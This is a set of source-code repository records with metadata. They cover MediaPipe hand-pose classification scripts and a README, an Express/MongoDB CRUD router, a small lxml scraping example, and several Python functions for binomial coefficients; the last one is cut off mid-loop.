flags=cv2.INTER_LINEAR)\n\n return result\n\ndef random_rotation(image, low_angle, high_angle):\n angle = random.randint(low_angle, high_angle)\n # print(\"angle : \", angle)\n return rotate_image(image, angle)\n" }, { "alpha_fraction": 0.39093589782714844, "alphanum_fraction": 0.4034635126590729, "avg_line_length": 38.911766052246094, "blob_id": "acd27db9318e99097862143e7dd50db67a99925d", "content_id": "17ee42a966351c2e9c43607b5b59121a7bd45dfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2714, "license_type": "no_license", "max_line_length": 119, "num_lines": 68, "path": "/misc/bbox_tocsv.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport os, glob\nimport mediapipe as mp\nimport pandas as pd\nfrom argparse import ArgumentParser\n\ndef b_box(args):\n src_path = args.image_dir\n user = os.listdir(src_path)\n mphands = mp.solutions.hands\n # hands = mphands.Hands()\n\n src_path = args.image_dir\n csv_columns = ['file_name', 'x_min', 'x_max', 'y_min','y_max']\n\n user = os.listdir(src_path)\n\n with mphands.Hands(\n static_image_mode=True,\n max_num_hands=1,\n min_detection_confidence=0.5) as hands:\n for usr in user:\n files = ['five','four','three','two','C','heavy','hang','L','ok','palm','palm_u']\n for fol in files:\n imgs = glob.glob(src_path+usr+\"/train_pose/\"+fol+\"/aug/*.png\")\n # print(imgs)\n ls = []\n for img in imgs:\n print(img)\n image = cv2.imread(img)\n h, w, _ = image.shape\n framergb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n result = hands.process(framergb)\n hand_landmarks = result.multi_hand_landmarks\n if hand_landmarks:\n list = []\n for handLMs in hand_landmarks:\n x_max = 0\n y_max = 0\n x_min = w \n y_min = h \n for lm in handLMs.landmark:\n x, y = int(lm.x * w), int(lm.y * h)\n if x > x_max:\n x_max = x\n if x < x_min:\n x_min = x\n if y > y_max:\n y_max = y\n if y < y_min:\n y_min = y\n # cv2.rectangle(frame, (x_min - 30, y_min - 30), (x_max + 30 , y_max + 30), (0, 255, 0), 2)\n \n list = [str(img).split(\"/\")[-1],x_min-30,x_max+30,y_min-30,y_max+30]\n ls.append(list)\n # break\n data = ls.copy()\n data = pd.DataFrame(data,columns=csv_columns)\n print(data.head())\n data.to_csv(src_path+usr+\"/train_pose/\"+fol+\".csv\")\n print(src_path+usr+\"/train_pose/\"+fol+\"/aug/\"+fol+\".csv\")\n \n\nif __name__ == \"__main__\":\n p = ArgumentParser()\n p.add_argument('--image_dir', type=str, default='./', help='Directory containing the images')\n args = p.parse_args()\n b_box(args)\n" }, { "alpha_fraction": 0.7234185934066772, "alphanum_fraction": 0.7341857552528381, "avg_line_length": 40.654205322265625, "blob_id": "1aec8168c56751ca93eee9f07b6c60c092bc800f", "content_id": "e67862a55d35d7825ee63c9922d5b4c73cf06ac6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4458, "license_type": "no_license", "max_line_length": 182, "num_lines": 107, "path": "/README.md", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "# Hand pose classification\n\nIn this project, we'll be doing hand pose classification based on the landmarks provided by [Mediapipe](https://google.github.io/mediapipe/solutions/hands#python-solution-api)\nThe idea is to classify the hand poses on the extracted landmarks (3D) rather than on the image itself.\n\nI'd like to discuss 2 approaches to this problem. \n1. Using the landmarks from mediapipe to train a deep learning model to do the classification based on landmarks instead of the image itself.\n2. Using the landmarks from mediapipe to classify the poses based on the landmarks. \n\n\n![](hand_landmarks.png)\n\nVideo demo can be found on [youtube](https://youtu.be/3V5tQBCl8wQ)\n## Dataset creation and input pipeline.\n\nIn this section,\n- Downloading the data. \n- Creating dataset with hand landmarks.\n- Using tf.data.Dataset to create input pipeline to the model.\n\n### Downloading the dataset\n\n1. Download the dataset from [link](https://www.gti.ssr.upm.es/data/MultiModalHandGesture_dataset)\n2. The dataset contains 16 different gestures from 25 unique users.\n3. Please note that the images are captured from a near-infrared camera.\n4. The gesture is a mirror image when viewed from the back of the hand and the nail side.\n5. For simplicity sake, I have selected gestures for C, five, four, hang, heavy, L, ok, palm, three, two \n6. Before running the script to extract the landmarks to a csv file, copy all images from different users.\n- [ ] write a script gather train images into a single folder.\n\n### Creating dataset with hand landmarks.\n\nloop:\n - for image in the gesture_dir:\n - run mediapipe on the image.\n - get the landmarks.\n - save the landmarks, gesture label, file_name to a csv file.\n \nusage:\n \n`python3 create_data.py --gesture_folder --save_dir --save_images --name_csv`\n\n- gesture_folder --> name of directory containing folders of gestures.\n- save_dir --> name of directory to save annotated images if --save_images is True\n- save_images --> flag to save annotated images or not.\n- name_csv --> name of the csv file containing the hand landmarks.\n\n\n![](examples/frame_17653_l.png) ![](examples/frame_17653_l_annotated.png)\n\n### Creating input pipeline\n\n1. The file at src/data.py is pretty self-explanatory for this step. \n\n## Training structure\n\n1. src/train.py contains all the configuration requirements to train the model.\n2. src/models.py contains the model arcitectures. Add your models here.\n3. src/train.py can test the model on live webcam feed or the test set if the flags are set appropriately.\n\nThe code is pretty self-explanatory. If you need any explanations, please feel free to contact me at [email protected]\n\n## Inference\n\nA test file is located in examples/test.csv which contains the ground truth of the pose along with filenames and the landmarks. \nThe train.py has a lot of arguments which can suit your needs. \n\nTo train on the data and test it on webcam feed:\n\n`python3 train.py --train True --test False --test_live True`\n\n\n## Method II\n\n![](IMG-0075.jpg)\n\nWe define a palm zone first, which is the area as shown in the figure.\nIf a finger tip is in the palm zone, we can make appropriate guesses. \nThe advantages of this method is that, we don't need to train a deep learning model and also we can use this model as a baseline to compare it against the deep learning based model. \nAlso, since there is no inference, we can save around 5ms. (In most cases this is negligible).\nThe disadvantages being that we have to manually code the finger tips to classify a gesture.\nIt is hard to code for gestures like five and palm since the difference between the two poses is subtle.\n\nA horizontal line is drawn between index_finger_mcp(5) and pinky_mcp(17) (blue line in the video)\n\nA vertical line is drawn between index_finger_mcp(5) and thumb_cmc(1) (red line in the video)\n\nTo guess the pose, \n1. check which points are in the palm zone, by checking if it is below the horizontal\n2. if the thumb is to the right of the vertical or to the left.\n\nList of gestures we I have trained on:\n\n| **Gesture** | **Fingers in palm zone** |\n| ------- | -------------------- |\n| L | middle, ring , pinky |\n| OK | index, thumb tip |\n| PALM | None |\n| TWO | ring, pinky ,thumb |\n| THREE | pinky, thumb |\n| FOUR | thumb |\n| FIVE | None |\n| HANG | middle, ring, index | \n| HEAVY | middle, ring | \n\n\ncheck out the video for this method [here](https://www.youtube.com/watch?v=jc1ATU62gMk).\n\n" }, { "alpha_fraction": 0.5371496081352234, "alphanum_fraction": 0.5591060519218445, "avg_line_length": 45.779815673828125, "blob_id": "19c3742971dec689214ceb11abd1d61136f87b64", "content_id": "cbf42ae0613f5f0fca146a3aad3a717a914b980e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5101, "license_type": "no_license", "max_line_length": 150, "num_lines": 109, "path": "/create_data.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport mediapipe as mp\nimport os\nimport tqdm\nfrom argparse import ArgumentParser\nimport pandas as pd\nimport time\n\n\ndef detect_hands(args):\n mp_drawing = mp.solutions.drawing_utils\n mp_hands = mp.solutions.hands\n landmarks = []\n\n # For static images:\n with mp_hands.Hands(\n static_image_mode=True,\n max_num_hands=2,\n min_detection_confidence=0.5) as hands:\n\n gesture_folder = os.listdir(args.gesture_folder)\n\n if not os.path.exists(os.getcwd() + '/' + args.save_dir): # if save dir is not created, create a directory to save images.\n os.mkdir(args.save_dir)\n\n print(f\"Gestures: {gesture_folder}\\n\")\n\n for dir in gesture_folder:\n\n image_files = [img for img in os.listdir(os.path.join(args.gesture_folder, dir)) if\n img.endswith('.jpeg') or img.endswith('.png') or img.endswith('.jpg')]\n\n for file in tqdm.tqdm(image_files, desc=f'Processing mediapipe on {dir} gesture images'):\n\n file_path = os.path.join(args.gesture_folder, dir, file)\n\n image = cv2.flip(cv2.imread(file_path), 1) # Read an image, flip it around y-axis for correct handedness output\n results = hands.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB)) # Convert the BGR image to RGB before processing.\n\n try:\n hand = results.multi_handedness[-1].classification.pop().label # To get which hand (left, right)\n except TypeError as e:\n hand = None\n\n if not results.multi_hand_landmarks:\n continue\n\n annotated_image = image.copy()\n\n for hand_landmarks in results.multi_hand_landmarks:\n\n if args.save_images == 'True':\n cv2.imwrite(args.save_dir + '/' + file, cv2.flip(annotated_image, 1))\n\n points = [file, dir, hand]\n\n for point in mp_hands.HandLandmark:\n normalized_landmark = hand_landmarks.landmark[point]\n points.append(normalized_landmark.x)\n points.append(normalized_landmark.y)\n points.append(normalized_landmark.z)\n\n landmarks.append(points)\n\n return landmarks\n\n\nif __name__ == \"__main__\":\n p = ArgumentParser()\n p.add_argument('--save_dir', type=str, default='annotated_images', help='Directory containing the saved images')\n p.add_argument('--gesture_folder', type=str, required=False, default='All_images', help=\"Gesture Training images\")\n p.add_argument('--save_images', type=str, required=False, default='False', help='Flag to save annotated images')\n p.add_argument('--name_csv', type=str, required=False, default='landmarks',\n help='Name of the csv to save the landmarks')\n\n print(p.format_usage())\n start = time.time()\n args = p.parse_args()\n\n landmarks = detect_hands(args)\n\n csv_columns = ['file_name', 'label', 'hand',\n '0-wrist.x', '0-wrist.y', '0-wrist.z',\n '1-thumb_cmc.x', '1-thumb_cmc.y', '1-thumb_cmc.z',\n '2-thumb_mcp.x', '2-thumb_mcp.y', '2-thumb_mcp.z',\n '3-thumb_ip.x', '3-thumb_ip.y', '3-thumb_ip.z',\n '4-thumb_tip.x', '4-thumb_tip.y', '4-thumb_tip.z',\n '5-index_finger_mcp.x', '5-index_finger_mcp.y', '5-index_finger_mcp.z',\n '6-index_finger_pip.x', '6-index_finger_pip.y', '6-index_finger_pip.z',\n '7-index_finger_dip.x', '7-index_finger_dip.y', '7-index_finger_dip.z',\n '8-index_finger_tip.x', '8-index_finger_tip.y', '8-index_finger_tip.z',\n '9-middle_finger_mcp.x', '9-middle_finger_mcp.y', '9-middle_finger_mcp.z',\n '10-middle_finger_pip.x', '10-middle_finger_pip.y', '10-middle_finger_pip.z',\n '11-middle_finger_dip.x', '11-middle_finger_dip.y', '11-middle_finger_dip.z',\n '12-middle_finger_tip.x', '12-middle_finger_tip.y', '12-middle_finger_tip.z',\n '13-ring_finger_mcp.x', '13-ring_finger_mcp.y', '13-ring_finger_mcp.z',\n '14-ring_finger_pip.x', '14-ring_finger_pip.y', '14-ring_finger_pip.z',\n '15-ring_finger_dip.x', '15-ring_finger_dip.y', '15-ring_finger_dip.z',\n '16-ring_finger_tip.x', '16-ring_finger_tip.y', '16-ring_finger_tip.z',\n '17-pinky_mcp.x', '17-pinky_mcp.y', '17-pinky_mcp.z',\n '18-pinky_pip.x', '18-pinky_pip.y', '18-pinky_pip.z',\n '19-pinky_dip.x', '19-pinky_dip.y', '19-pinky_dip.z',\n '20-pinky_tip.x', '20-pinky_tip.y', '20-pinky_tip.z',\n ]\n\n csv_landmarks = pd.DataFrame(landmarks, columns=csv_columns)\n print(\"Saving landmarks to landmarks.csv...\")\n csv_landmarks.to_csv(f'data/{args.name_csv}.csv', index=False)\n print(f\"total time taken: {(time.time() - start) / 60} mins\")\n\n\n" }, { "alpha_fraction": 0.49492642283439636, "alphanum_fraction": 0.5134449601173401, "avg_line_length": 44.83720779418945, "blob_id": "60c5b7f6667fc4c653b6a864370e99b766d72051", "content_id": "64c045f9a84ad6e449b237811b12dadfb86166e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7884, "license_type": "no_license", "max_line_length": 135, "num_lines": 172, "path": "/src/live_test.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport mediapipe as mp\nimport numpy as np\nimport time\nimport json\nimport tensorflow as tf\nfrom argparse import ArgumentParser\nfrom tensorflow.keras.models import load_model\n\n\nclass WebcamTest:\n mp_drawing = mp.solutions.drawing_utils\n mp_hands = mp.solutions.hands\n\n def __init__(self, model):\n self.hands = mp.solutions.hands\n self.model = model\n self.internal_camera_index = None\n self.external_camera_index = None\n self.video = None\n self.select_camera_source()\n\n with open('encoded_labels.json', 'r') as f:\n self.labels = json.load(f, encoding='unicode_escape')\n self.font = cv2.FONT_HERSHEY_COMPLEX_SMALL\n\n def select_camera_source(self):\n \"\"\"\n Tries to find the camera source.\n Priority is given to external webcams over built-in cameras\n because of better quality input.\n Assuming,\n 1. The external camera cam be located with an index < 5.\n 2. In-built camera index is\n :return: selected camera source\n \"\"\"\n for camera_index in range(5, -1, -1):\n camera = cv2.VideoCapture(camera_index)\n print(f\"checking for camera input at index: {camera_index}\")\n success, frame = camera.read()\n if success and frame is not None:\n if camera_index > 1:\n print(f\"external camera found at index: {camera_index}\")\n self.external_camera_index = camera_index\n else:\n print(f\"built-in camera found at index: {camera_index}\")\n self.internal_camera_index = camera_index\n print(f\"camera resolution: {frame.shape[0]} {frame.shape[1]}\")\n camera.release()\n\n if self.external_camera_index:\n self.video = cv2.VideoCapture(self.external_camera_index)\n else:\n self.video = cv2.VideoCapture(self.internal_camera_index)\n\n def detect_hands(self):\n\n with self.hands.Hands(min_detection_confidence=0.5,\n min_tracking_confidence=0.5,\n max_num_hands=1) as hands:\n\n while self.video.isOpened():\n\n success, frames = self.video.read()\n frame = frames.copy()\n image_width, image_height, _ = frames.shape\n\n if not success:\n print(\"No camera connected.\")\n break\n\n start_time = time.time()\n frames = cv2.cvtColor(cv2.flip(frames, 1), cv2.COLOR_BGR2RGB)\n frames.flags.writeable = False\n\n results = hands.process(frames)\n image = cv2.cvtColor(frames, cv2.COLOR_RGB2BGR)\n\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n for point in WebcamTest.mp_hands.HandLandmark:\n index_finger_mcp = np.array(\n (int(hand_landmarks.landmark[point.INDEX_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.INDEX_FINGER_MCP].y * image_width)))\n\n middle_finger_mcp = np.array(\n (int(hand_landmarks.landmark[point.MIDDLE_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.MIDDLE_FINGER_MCP].y * image_width)))\n\n ring_finger_mcp = np.array(\n (int(hand_landmarks.landmark[point.RING_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.RING_FINGER_MCP].y * image_width)))\n\n pinky_finger_mcp = np.array((int(hand_landmarks.landmark[point.PINKY_MCP].x * image_height),\n int(hand_landmarks.landmark[point.PINKY_MCP].y * image_width)))\n\n thumb_cmc = np.array((int(hand_landmarks.landmark[point.THUMB_CMC].x * image_height),\n int(hand_landmarks.landmark[point.THUMB_CMC].y * image_width)))\n\n wrist = np.array((int(hand_landmarks.landmark[point.WRIST].x * image_height),\n int(hand_landmarks.landmark[point.WRIST].y * image_width)))\n\n WebcamTest.mp_drawing.draw_landmarks(\n image, hand_landmarks, WebcamTest.mp_hands.HAND_CONNECTIONS)\n\n vertices = np.array([[index_finger_mcp[0], index_finger_mcp[1]],\n [middle_finger_mcp[0], middle_finger_mcp[1]],\n [ring_finger_mcp[0], ring_finger_mcp[1]],\n [pinky_finger_mcp[0], pinky_finger_mcp[1]],\n [wrist[0], wrist[1]],\n [thumb_cmc[0], thumb_cmc[1]]], dtype=np.int32)\n\n pts = vertices.reshape((-1, 1, 2))\n cv2.polylines(image, [pts], isClosed=True, color=(0, 0, 0), thickness=3)\n\n # fill the palm zone.\n cv2.fillPoly(image, [pts], color=(0, 200, 200))\n\n # horizontal line from index finger to pinky finger\n cv2.line(image, (index_finger_mcp[0], index_finger_mcp[1]),\n (pinky_finger_mcp[0], pinky_finger_mcp[1]), (255, 0, 0), thickness=2)\n\n # vertical line from index finger to thumb\n cv2.line(image, (index_finger_mcp[0], index_finger_mcp[1]),\n (thumb_cmc[0], thumb_cmc[1]), (0, 0, 255), thickness=2)\n\n landmarks_results = str(results.multi_hand_landmarks[0]).split()\n coordinates_list = [coordinate for coordinate in landmarks_results if coordinate != 'landmark' if coordinate != '{'\n if coordinate != '}' if coordinate != 'x:' if coordinate != 'y:' if coordinate != 'z:']\n\n coordinates_array = np.array(coordinates_list, dtype='float32')\n input_array = np.expand_dims(coordinates_array, axis=0)\n prediction = self.model.predict(input_array)\n predicted_label = self.labels[str(np.argmax(prediction))]\n\n else:\n predicted_label = \"No hand\"\n\n cv2.putText(frame, predicted_label, (35, 35), self.font, 1, (255, 0, 0), 1, cv2.LINE_4)\n cv2.putText(frame, str(\"{0:.3f}\".format((time.time() - start_time) * 100)) + 'ms',\n (35, 65), self.font, 1, (0, 0, 255), 2,\n cv2.LINE_4)\n cv2.imshow('Live Test', cv2.resize(frame, (320, 240)))\n cv2.imshow('MediaPipe Hands', cv2.resize(cv2.flip(image, 1), (320, 240)))\n\n if cv2.waitKey(5) & 0xFF == ord('q'):\n self.on_destroy()\n\n def on_destroy(self):\n self.video.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n\n p = ArgumentParser()\n p.add_argument('--model_dir', required=False, type=str,\n default='models/model_27-6-6_58/trained_model.h5',\n help='path to trained_model.h5')\n\n print(p.format_usage())\n args = p.parse_args()\n model = load_model(args.model_dir)\n physical_devices = tf.config.list_physical_devices('GPU')\n\n if physical_devices:\n print(\"GPU is available\")\n else:\n print(\"GPU is not available\")\n\n test = WebcamTest(model)\n test.detect_hands()\n" }, { "alpha_fraction": 0.6613067984580994, "alphanum_fraction": 0.6694742441177368, "avg_line_length": 51.22666549682617, "blob_id": "17e020294858b69f808eab7b6dc51d708194b611", "content_id": "a399ed47c0a0f86087275cceff48fdebbf6d7a3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3918, "license_type": "no_license", "max_line_length": 135, "num_lines": 75, "path": "/utils/Hand.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom numpy.core.numeric import cross \n\nclass Hand():\n\n def __init__(self, mp_hands, hand_landmarks, hand):\n self.IMAGE_WIDTH = 480\n self.IMAGE_HEIGHT = 640\n self.orientation = hand.multi_handedness[-1].classification.pop().label\n self.bbox = None\n self.landmarks = None\n\n self.wrist = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.WRIST].x * self.IMAGE_HEIGHT ),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.WRIST].y * self.IMAGE_WIDTH)))\n\n self.thumb = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].y * self.IMAGE_WIDTH)))\n\n self.index_finger = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].y * self.IMAGE_WIDTH)))\n\n self.middle_finger = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].x * self.IMAGE_HEIGHT ),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].y * self.IMAGE_WIDTH)))\n\n self.ring_finger = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_TIP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_TIP].y * self.IMAGE_WIDTH)))\n\n self.pinky_finger = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_TIP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_TIP].y * self.IMAGE_WIDTH)))\n\n self.thumb_cmc = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_CMC].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_CMC].y * self.IMAGE_WIDTH)))\n\n self.thumb_ip = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_IP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_IP].y * self.IMAGE_WIDTH)))\n\n self.index_finger_mcp = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_MCP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_MCP].y * self.IMAGE_WIDTH)))\n\n self.middle_finger_mcp = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_MCP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_MCP].y * self.IMAGE_WIDTH)))\n\n self.ring_finger_mcp = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_MCP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_MCP].y * self.IMAGE_WIDTH)))\n\n self.pinky_mcp = np.array((int(hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_MCP].x * self.IMAGE_HEIGHT),\n int(hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_MCP].y * self.IMAGE_WIDTH)))\n\n self.palm_line = [self.index_finger_mcp, self.pinky_mcp]\n\n\n def is_point_above_palm_line(self, point):\n \n if self.cross_product(point) > 0:\n return True\n\n return False\n\n def cross_product(self, point):\n\n vector_1 = [self.palm_line[1][0] - self.palm_line[0][0], self.palm_line[1][1] - self.palm_line[0][1]]\n\n vector_2 = [self.palm_line[1][0] - point[0], self.palm_line[1][1] - point[1]]\n\n result = (vector_1[0] * vector_2[1]) - (vector_1[1] * vector_2[0])\n\n return result\n\n def print_all_finger_tips(self):\n print(f\"wrist point: {self.wrist}\")\n print(f\"thumb: {self.thumb}\")\n print(f\"index finger: {self.index_finger}\")\n print(f\"middle finger: {self.middle_finger}\")\n print(f\"ring finger: {self.ring_finger}\")\n print(f\"pinky finger: {self.pinky_finger}\")\n\n" } ]
21
rsher60/macdata
https://github.com/rsher60/macdata
900f11dc8afd4cf133c1fa954905eb04c62a646c
99f946f48b2d5dbb8266e2470a52a69cf15a5b84
82d7de453a651e342e22332300563db952cb11f8
refs/heads/master
2020-05-17T11:18:44.598063
2019-04-26T19:31:39
2019-04-26T19:31:39
183,683,226
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5967429280281067, "alphanum_fraction": 0.6025591492652893, "avg_line_length": 23.330188751220703, "blob_id": "462165eadb80d8784c4f93bd91c620ee903f9849", "content_id": "7c8b524c2a578ea907680c87ee8a66d8362a37db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2579, "license_type": "no_license", "max_line_length": 101, "num_lines": 106, "path": "/routes/index.js", "repo_name": "rsher60/macdata", "src_encoding": "UTF-8", "text": "var express = require('express');\nvar router = express.Router();\nvar mongo = require('mongodb').MongoClient;\nvar objectId = require('mongodb').ObjectID;\nvar assert = require('assert');\nvar ps = require('python-shell');\nvar dash = require('appmetrics-dash').attach()\n\nvar url = 'mongodb://localhost:27017/test-database-1';\n\n/* GET home page. */\nrouter.get('/', function(req, res, next) {\n res.render('index');\n});\n\n//additions after 2/4/2019\nrouter.get('/python',function(req,res,next){\n ps.PythonShell.run('/PATH/TO/example.py', null, function (err, results)\n { if (err) throw err;\n console.log('finished'); \n console.log(results);\n });\n});\n//--------------------------------------------------\nrouter.get('/download', function(req,res,nect){\n res.render('index3')\n});\n\nrouter.get('/get-data', function(req, res, next) {\n var resultArray = [];\n mongo.connect(url, function(err, db) {\n assert.equal(null, err);\n var cursor = db.collection('collection').find();\n cursor.forEach(function(doc, err) {\n assert.equal(null, err);\n resultArray.push(doc);\n }, function() {\n db.close();\n // res.render('index4', {items: resultArray});\n return res.json(resultArray)\n console.log(resultArray);\n });\n });\n});\n\n\nrouter.get('/view-data',function(req,res,next){\n\n res.render('index4');\n})\n\n\n\nrouter.post('/insert', function(req, res, next) {\n var item = {\n Area: req.body.Area,\n content: req.body.content,\n author: req.body.author\n };\n\n mongo.connect(url, function(err, db) {\n assert.equal(null, err);\n db.collection('user-data').insertOne(item, function(err, result) {\n assert.equal(null, err);\n console.log('Item inserted');\n db.close();\n });\n });\n\n res.redirect('/');\n});\n\nrouter.post('/update', function(req, res, next) {\n var item = {\n Area: req.body.Area,\n content: req.body.content,\n author: req.body.author\n };\n var id = req.body.id;\n\n mongo.connect(url, function(err, db) {\n assert.equal(null, err);\n db.collection('user-data').updateOne({\"_id\": objectId(id)}, {$set: item}, function(err, result) {\n assert.equal(null, err);\n console.log('Item updated');\n db.close();\n });\n });\n});\n\nrouter.post('/delete', function(req, res, next) {\n var id = req.body.id;\n\n mongo.connect(url, function(err, db) {\n assert.equal(null, err);\n db.collection('user-data').deleteOne({\"_id\": objectId(id)}, function(err, result) {\n assert.equal(null, err);\n console.log('Item deleted');\n db.close();\n });\n });\n});\n\n\n\nmodule.exports = router;\n" }, { "alpha_fraction": 0.7307692170143127, "alphanum_fraction": 0.7371794581413269, "avg_line_length": 50, "blob_id": "2f92c9850f4c14770b32434c7195dfbb3d80d5ad", "content_id": "9d147476cfea896dd2df020223f9c8b008d9589b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 468, "license_type": "no_license", "max_line_length": 121, "num_lines": 9, "path": "/routes/upload-folder/webscrap.py", "repo_name": "rsher60/macdata", "src_encoding": "UTF-8", "text": "#install lxml and requests\r\n#install requests\r\nfrom lxml import html\r\nimport requests\r\npage = requests.get('http://econpy.pythonanywhere.com/ex/001.html') #requests.get to retrieve the web page with our data \r\ntree = html.fromstring(page.content) #page.content because html.fromstring imports the data explicityly as butes\r\nbuyers = tree.xpath('//div[@title=\"buyer-name\"]/text()')\r\nprices = tree.xpath('//span[@class=\"item-price\"]/text()')\r\nprint 'Buyers : ', buyers\r\n" } ]
2
charlesqwu/math
https://github.com/charlesqwu/math
d6147328ac47f86965003898632cd47bd81522bf
982c9a6978ee4035717b0873bdcd0be4ad0a28ee
7058d75c2646bf9c154891a2a07a285cb16abacb
refs/heads/master
2021-01-10T13:36:04.916421
2015-11-20T23:37:16
2015-11-20T23:37:16
46,591,894
5
0
null
null
null
null
null
[ { "alpha_fraction": 0.813829779624939, "alphanum_fraction": 0.813829779624939, "avg_line_length": 93, "blob_id": "19f510b8a432faaa8cb7caa2689088fb21b6f0fa", "content_id": "4e077314b66dd0648331344a55543db8784043e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 188, "license_type": "no_license", "max_line_length": 180, "num_lines": 2, "path": "/README.md", "repo_name": "charlesqwu/math", "src_encoding": "UTF-8", "text": "# math\nAlgorithms for some problems in linear algebra and combinatorics. For example, for generating a binomial coefficient, I have code about a dozen of algorithms for the same function.\n" }, { "alpha_fraction": 0.5604336261749268, "alphanum_fraction": 0.5899729132652283, "avg_line_length": 25.919708251953125, "blob_id": "7fcbf1417db83119a18d413713afd6bf1210f97f", "content_id": "1adfe85fbc0c3aa644185a28dabd2b50dd26d3b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3690, "license_type": "no_license", "max_line_length": 86, "num_lines": 137, "path": "/binomial.py", "repo_name": "charlesqwu/math", "src_encoding": "UTF-8", "text": "# This set of solutions is for calculating the binomial coefficient C(n,k)\n\n# These code snippets have been tested in Python2.7\n# To test in Python3.x, just need to change print statement to print function\n\n# Solution 1: Use the beta() function in the scipy.special module\n# The beta() function is basically an analytic extension of the binomial\n# function from non-negative integers to complex numbers\nfrom scipy.special import beta\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n return int(1/((n+1) * beta(n-k+1, k+1)))\n\n\n# Solution 2: Use the convolve() function in the numpy module\n# The discrete convolution between two vectors corresponds to multiplying\n# the two polynomials with coefficients as the two vectors\nfrom numpy import convolve\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n\n if n < 2: return 1\n kernel, row = [1,1], [1]\n for i in range(n):\n row = convolve(kernel, row)\n return row[k]\n\n\n# Solution 3: Use the polymul() function from the numpy.polynomial module\n# basically the same kind of solution as the above one\nfrom numpy.polynomial import polymul\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n\n if n < 2: return 1\n kernel, row = [1,1], [1]\n for i in range(n):\n row = polymul(kernel, row)\n return int(row[k])\n\n\n# Solution 4: Use the factorial() function from the math module\nfrom math import factorial\ndef c(n,k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n return factorial(n) / (factorial(n-k) * factorial(k))\n\n# or gamma\nfrom math import gamma\ndef c(n,k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n return int(gamma(n+1) / (gamma(n-k+1) * gamma(k+1)))\n\n# Solution 5:\n# define a function for falling factorial (aka, Pochhammer notation)\n# falling-factorial(n,k) = n*(n-1)*......*(n-k+1)\ndef ff(n, k):\n return reduce(lambda p,i:p*i, range(n,k,-1), 1)\n\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n return ff(n, n-k) / ff(k, 1)\n\n\n# Solution 6: recursive solution\ndef b(n, k):\n if n < 0 or k > n: \n return 0\n if k==0 or k==n: \n return 1\n if k > n/2: \n k = n - k\n return b(n-1,k-1) + b(n-1,k)\n\n\n# Solution 7: iterative (dynamic programming)\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n\n p=[1]\n for i in range(1, n+1):\n new = 1\n for j in range(1, i):\n new, p[j-1] = p[j-1] + p[j], 